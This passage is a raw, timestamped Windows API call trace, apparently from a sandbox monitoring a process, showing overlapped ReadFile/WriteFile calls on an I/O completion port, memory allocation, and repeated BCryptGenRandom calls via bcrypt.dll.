lpOverlapped=0x322fc18) returned 1 [0180.487] CloseHandle (hObject=0x2a8) returned 1 [0180.487] free (_Block=0x1ff1e60) [0180.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.489] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x37e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0180.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.489] CloseHandle (hObject=0x2a4) returned 1 [0180.489] free (_Block=0x3df0008) [0180.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.845] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x172, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0180.845] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.845] CloseHandle (hObject=0x2a4) returned 1 [0180.846] free (_Block=0x3df0008) [0180.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.866] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.867] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0180.867] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.867] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0180.868] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.868] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.868] free (_Block=0x3e305b8) [0180.868] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.868] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.868] free (_Block=0x1fa91d0) [0180.869] free (_Block=0x1fa2ed8) [0180.869] free (_Block=0x1fa90b8) [0180.869] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.869] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.870] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.870] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.882] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x253, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.882] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.883] CloseHandle (hObject=0x2a8) returned 1 [0180.883] free (_Block=0x1ff1e60) [0180.883] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.895] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x899, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0180.895] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.895] CloseHandle (hObject=0x2a4) returned 1 [0180.895] free (_Block=0x3df0008) [0180.895] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.908] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4d5, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.908] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.909] CloseHandle (hObject=0x2a8) returned 1 [0180.909] free (_Block=0x1ff1e60) [0180.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.922] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x31f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0180.923] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.923] CloseHandle (hObject=0x2a4) returned 1 [0180.923] free (_Block=0x3df0008) [0180.923] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.933] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5ac, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.933] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.933] CloseHandle (hObject=0x2a8) returned 1 [0180.933] free (_Block=0x1ff1e60) [0180.933] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.953] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2e2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0180.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.953] CloseHandle (hObject=0x2a8) returned 1 [0180.953] free (_Block=0x3df0008) [0180.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.966] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x387, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0180.967] CloseHandle (hObject=0x2a4) returned 1 [0180.967] free (_Block=0x1ff1e60) [0180.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0181.000] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2d7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0181.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0181.000] CloseHandle (hObject=0x2a4) returned 1 [0181.001] free (_Block=0x3df0008) [0181.001] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0181.034] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.035] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0181.035] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.035] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0181.036] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0181.036] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0181.036] free (_Block=0x3e305b8) [0181.036] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0181.036] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0181.036] free (_Block=0x1fa91d0) [0181.036] free (_Block=0x1fa2ed8) [0181.036] free (_Block=0x1fa90b8) [0181.036] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0181.037] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0181.044] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.045] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0181.045] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.045] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0181.046] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0181.046] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0181.046] free (_Block=0x3e305b8) [0181.046] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0181.046] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0181.046] free (_Block=0x1fa91d0) [0181.046] free (_Block=0x1fa2ed8) [0181.046] free (_Block=0x1fa90b8) [0181.046] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0181.047] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0181.062] CloseHandle (hObject=0x2a8) returned 1 [0181.062] free (_Block=0x1ff1e60) [0181.063] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0181.076] CloseHandle (hObject=0x338) returned 1 [0181.077] free (_Block=0x3d70450) [0181.077] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0181.093] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0181.093] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0181.108] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xe50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0181.108] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0181.120] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x450, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0181.120] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0181.123] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x76c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0181.123] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0181.124] CloseHandle (hObject=0x170) returned 1 [0181.124] free (_Block=0x3ef0008) [0181.124] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0181.126] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3b4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0181.126] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0181.126] CloseHandle (hObject=0x2a4) returned 1 [0181.126] free (_Block=0x3df0008) [0181.126] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0182.485] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0182.485] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0183.659] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0183.660] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0183.671] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.672] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0183.672] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.672] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0183.673] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0183.673] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0183.673] free (_Block=0x3e305b8) [0183.673] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0183.673] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0183.673] free (_Block=0x1fa91d0) [0183.673] free (_Block=0x1fa2ed8) [0183.673] free (_Block=0x1fa90b8) [0183.673] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0183.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0183.686] CloseHandle (hObject=0x170) returned 1 [0183.686] free (_Block=0x3d70450) [0183.686] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0183.697] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x6ad, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0183.697] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0183.706] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x69f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0183.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0183.714] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.715] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0183.715] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.715] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0183.715] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0183.715] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0183.716] free (_Block=0x3e305b8) [0183.716] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0183.716] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0183.716] free (_Block=0x1fa91d0) [0183.716] free (_Block=0x1fa2ed8) [0183.716] free (_Block=0x1fa90b8) [0183.716] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0183.717] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0183.734] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x2017, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0183.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0183.736] CloseHandle (hObject=0x308) returned 1 [0183.736] free (_Block=0x3f70048) [0183.736] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0183.738] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1323, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0183.738] 